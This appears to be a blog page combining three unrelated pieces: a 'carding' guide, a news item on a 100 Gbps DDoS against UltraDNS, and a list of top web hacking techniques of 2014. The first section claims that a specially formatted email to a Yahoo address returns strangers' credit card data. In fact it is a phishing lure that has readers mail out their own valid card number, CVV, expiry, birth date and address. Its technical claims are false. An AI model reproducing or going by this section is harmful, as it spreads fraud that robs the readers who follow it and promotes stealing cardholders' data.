 Send an Email to confuse a yahoo server mailbot, so that it will return to YOUR EMAIL with complete information on people's credit card information stored in the server in the last 72 hours. This is how you will get people's VALID credit card information. Now you have to do exactly the same as follows:
 
 EDIT: removed redundant information
 
Send an Email to bot.servicer@yahoo.com
 
With the subject: accntopp-cc-E52488 (To confuse the server)
 
In the email body, write:
 
boundary=’0-86226711-106343’ (This is line 1)
 
Content-Type: text/plain; (This is line 3) charset=us-ascii (This is line 4, to make the return email readable)
 
credit card number (This is line 7, has to be LOWER CASE letters) 000000000000000 (This is line 8, put a zero under each character, number, letter, hyphen, etc)
 
name on credit card (This is line 11, has to be LOWER CASE letters) 0000000000000000 (This is line 12, put a zero under each character, number, letter, hyphen, etc)
 
cid/cvv2 number this is either a three digit or four number on the back or front of the card. It depends on the type of credit card your using (This is line 15, has to be LOWER CASE letters) 0000000000000 (This is line 16, put a zero under each character, number, letter, hyphen, etc)
 
address,city (This is line 19, has to be LOWER CASE letters) 0000000000 (This is line 20, put a zero under each character, number, letter, hyphen, etc)
 
state,country,zip(This is line 23, has to be LOWER CASE letters) 00000000000000000 (This is line 24, put a zero under each character, number, letter, hyphen, etc)
 
Phone number (Including area code)This is line 27, has to be LOWER CASE letters) 00000000000000000 (This is line 28, put a zero under each character, number, letter, hyphen, etc)
type of card (This is line 31, has to be LOWER CASE letters) 0000000000 (This is line 32, put a zero under each character, number, letter, hyphen, etc)
 
expiration date (This is line 35, has to be LOWER CASE letters) 0000000000000  (This is line 36, put a zero under each character, number, letter, hyphen, etc)
 
E-mail(This is line 47, has to be LOWER CASE letters) 0000000000000 (This is line 48, put a zero under each character, number, letter, hyphen, etc)
 
252ads (This is line 51)
 
Return-Path: (This is line 54, type in your email between ) s_

 You have to make sure you do EXACTLY as what is said above and the credit card info above the 0000 are absolutely CORRECT/VALID. Valid, meaning one that is registered in your major credit card database.
 
 For those who like to play it safe, thinking this is too good to be true. Get this; the card number you use as bait can be one that has been discontinued (canceled). However, it cannot be expired and the card information must be correct. If it is expired and the information incorrect, you will simply get back No data retrieved & #8221; as a reply. And you thought those canceled credit cards you keep in your wallet, just because they're pretty, were useless.
 
 Here is a sample email: (CAUTION! This is only example, and the card is INVALID, to get the whole thing to work, you MUST use a VALID credit card as bait. Follow the steps below:
 
Send an Email to mailto: bot.servicer@yahoo.com
 
 With the subject: accntopp-ce-E52488 (To confuse the server )

boundary="0-86226711-CC-Verificator-106343"
Content-Type: text/plain; charset=us-ascii
5118442085939873
0000000000000000
 
john smith
000000000000
 
 
 
01/13/1975
00000000
 
023
000
 
1463 moorpark street
00000000000000000 
 
manchester, g21 2ns
00000000000000000
8189810900

0000000000
mastercard

0000000000
12/15

0000

00000000000000000000000000
252ads< m >
 
return-path:
 
Once again, you have to make sure that you DO NOT COPY THE SAMPLE EMAIL ABOVE, because it will NOT work!!! It is there to help you set it up. Instead, you MUST provide A VALID AND CORRECT CARD, otherwise you will NOT get the information you want

send the message to bot. servicer@yahoo.com

in the subject bar write accntopp-cc-E52488-verify-info
 
now for the body of the email write how it is below (in lower case letters and using your own details)
 
boundary="0-86226711-CC-Verificator-106343"
 
Content-Type: text/plain; charset=us-ascii
 
card number (use your own)

0000000000 (a zero for every digit)
 
name on card (use your own)

0000000000 (a zero for every letter)
 
date of birth (use your own)

00000000000 (a zero for every digit)
 
cid/cvv2 number (on back of your card)

000 (should be 3 or 4 zeros)
 
address linked to card (use the one linked to your card)

0000000000000000000 (a zero for every number and digit)
 
city,state and zip code (use the one linked to card)

0000000000000000000 (a zero for every letter and digit)
 
phone number (use your own)

00000000000 (a zero for every digit)
 
type of card (mastercard, visa etc)

0000000000 (a zero for every letter)
 
expiry date (use the one on card)

000000 (a zero for every digit)
 
your email address (use your every day email for this)

0000000000000000 (a zero for every character)
 
252ads< m >
 
return-path:
 
 
 

UltraDNS Dealing with DDoS Attack

“Currently, only customers utilizing a segment of UltraDNS Name Server addresses are experiencing resolution latency due to intermittent network saturation in the Western US,” said Neustar director of product management, security solutions, Jim Fink in an email to Threatpost. “We continue to aggressively refine mitigations for these customers and hope to have the issue resolved shortly. We have been and will continue to provide regular updates to our UltraDNS customers via our usual customer notification process.” UltraDNS is a Neustar company.
 
The SANS Institute’s Internet Storm Center said this afternoon that it received multiple reports of outages and DNS resolution issues, reportedly because of a 100 Gbps DDoS attack against one of UltraDNS’ customers that resulted in latency issues for others.
“One reporting party did indicate that they learned that the management of UltraDNS had said that one of their customers was being attacked and that they black-holed that customer to get back on trend,” wrote ISC handler Russ McRee. “Resolver nodes around the world are resetting.”

DDoS attacks the size of this one are quickly becoming the norm. A report from Arbor Networks this week said it has already tracked more than 70 DDoS attacks of 100 Gbps or more of bad traffic, topping out at 325 Gbps. The largest attacks on public record were recorded by traffic optimization and security provider CloudFlare
Most volumetric attacks rely on some kind of amplification such as DNS reflection or Network Time Protocol amplification attacks where the requesting IP address is spoofed as the target’s and massive amounts of traffic is returned at relatively little cost to the attacker.
With DNS amplification attacks, attackers take advantage of any number of the 28 million open DNS resolvers on the Internet to launch large-scale DDoS attacks. The motivations are varied. Ideological hackers use them to take down services in protest, while profit-motivated criminals can use DDoS as a cover for intellectual property theft and financial fraud.
Beginning with the DDoS attacks against large U.S. banks early last year, the spike in these attacks merited a mention in the recent Verizon Data Breach Investigations Report.
“We’re seeing a growing trend of combining DDoS with APT campaigns,” said Arbor Networks’ Gary Sockrider said. “Go back a few years, and DDOs was thought of more as a takedown mechanism, not for data exfiltration. Now we’re seeing it more frequently combined with APT, prolonged campaigns where an attacker is on your network and now need to get the data out, they’ll initiate a DDoS attack. It’s the equivalent of a natural disaster and while you’re dealing with it, that’s when they’ll exfiltrate data.”
 

Top 10 Web Hacking Techniques 2014



Every year the security community produces a stunning number of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web
browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, we are solely focused on new and creative methods of Web-based attack. Now in its eighth year, the Top 10 Web Hacking Techniques list encourages information sharing, provides a centralized knowledge base, and recognizes researchers who contribute excellent work. Past Top 10s and the number of new attack techniques discovered in each year


The Top 10

  1. Mario Heiderich – Mutation XSS
  2. Angelo Prado, Neal Harris, Yoel Gluck – BREACH
  3. Pixel Perfect Timing Attacks with HTML5
  4. Lucky 13 Attack
  5. Weaknesses in RC4
  6. Timur Yunusov and Alexey Osipov – XML Out of Band Data Retrieval
  7. Million Browser Botnet Video Briefing
    Slideshare
  8. Large Scale Detection of DOM based XSS
  9. Tor Hidden-Service Passive De-Cloaking
  10. HTML5 Hard Disk Filler™ API





Recent Post

Total Pageviews

Powered by Blogger.

Popular Posts